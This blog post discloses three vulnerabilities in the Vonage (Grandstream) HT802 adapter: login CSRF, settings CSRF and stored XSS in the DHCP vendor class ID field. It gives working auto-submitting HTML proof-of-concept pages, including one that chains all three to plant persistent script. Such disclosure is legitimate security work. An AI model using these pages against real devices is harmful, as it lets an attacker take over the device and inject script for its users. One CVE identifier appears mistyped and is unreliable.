Vonage HT802 – Multiple Vulnerabilities

I have disclosed three vulnerabilities in the Vonage (Grandstream) HT802.  I haven’t received a response from Vonage.  These vulnerabilities can be chained to inject persistent XSS in the Basic Settings screen of the device.

Update: I have the following received CVEs for these vulnerabilities:

1.) Cross-Site Request Forgery (CSRF) vulnerability in the login screen (/cgi-bin/login) allows an attacker to log into a target Vonage device. (CVE-2017-165635)

<html>
<body>
<form style="visibility: hidden" id="csrf" name="loginForm" action="http://192.168.0.160/cgi-bin/dologin" method="POST">
<input name="P2" type="password" value="123">
<input type="submit" name="Login" value="Login">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
document.getElementById("csrf").submit();
</script>
</body>
</html>

view raw
login-csrf.html
hosted with ❤ by GitHub

POC Verified in Firefox 56.0 on macOS

2.) Cross-Site Request Forgery (CSRF) vulnerability in the Basic Settings screen allows an attacker to modify system settings. (CVE-2017-16563)

<html>
<body>
<form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post">
<input name="P196" value="">
<input name="P901" value="80">
<input name="P8" value="0">
<input name="P146" value="">
<input name="P148" value="">
<input name="P148" value="csrf-entry" maxlength="32" size="30" type="text">
<input name="P9" value="192">
<input name="P10" value="168">
<input name="P11" value="0">
<input name="P12" value="160">
<input name="P13" value="255">
<input name="P14" value="255">
<input name="P15" value="0">
<input name="P16" value="0">
<input name="P17" value="0">
<input name="P18" value="0">
<input name="P19" value="0">
<input name="P20" value="0">
<input name="P64" value="TZG%2B6">
<input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0">
<input name="P143" value="1">
<input name="P342" value="0">
<input name="update" value="update">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
document.getElementById("xss-form").submit()
</script>
</body>
</html>

POC Verified in Firefox 56.0 on macOS

3.) Stored Cross-site scripting (XSS) vulnerability in cgi-bin/config2 in Vonage HT802 allows remote authenticated users to inject arbitrary web script or HTML via the DHCP vendor class ID field (P148). (CVE-2017-16564)

<html>
<body>
<form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post">
<input name="P196" value="">
<input name="P901" value="80">
<input name="P8" value="0">
<input name="P146" value="">
<input name="P148" value="">
<input name="P148" value="&quot;autofocus/onfocus=alert(1)//" maxlength="32" size="30" type="text">
<input name="P9" value="192">
<input name="P10" value="168">
<input name="P11" value="0">
<input name="P12" value="160">
<input name="P13" value="255">
<input name="P14" value="255">
<input name="P15" value="0">
<input name="P16" value="0">
<input name="P17" value="0">
<input name="P18" value="0">
<input name="P19" value="0">
<input name="P20" value="0">
<input name="P64" value="TZG%2B6">
<input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0">
<input name="P143" value="1">
<input name="P342" value="0">
<input name="update" value="update">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
document.getElementById("xss-form").submit()
</script>
</body>
</html>

view raw
basic-settings.html
hosted with ❤ by GitHub

POC Verified in Firefox 56.0 on macOS

These three vulnerabilities can be chained to inject a persistent XSS payload into the Basic Settings page.

<html>
<body>
<iframe id="csrf" src="./login-csrf.html"></iframe>
<form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post">
<input name="P196" value="">
<input name="P901" value="80">
<input name="P8" value="0">
<input name="P146" value="">
<input name="P148" value="">
<input name="P148" value="&quot;autofocus/onfocus=alert(1)//" maxlength="32" size="30" type="text">
<input name="P9" value="192">
<input name="P10" value="168">
<input name="P11" value="0">
<input name="P12" value="160">
<input name="P13" value="255">
<input name="P14" value="255">
<input name="P15" value="0">
<input name="P16" value="0">
<input name="P17" value="0">
<input name="P18" value="0">
<input name="P19" value="0">
<input name="P20" value="0">
<input name="P64" value="TZG%2B6">
<input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0">
<input name="P143" value="1">
<input name="P342" value="0">
<input name="update" value="update">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
var frame = document.getElementById('csrf');
frame.addEventListener("load", function() {
window.setTimeout(document.getElementById("xss-form").submit(),1000);
});
</script>
</body>
</html>

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s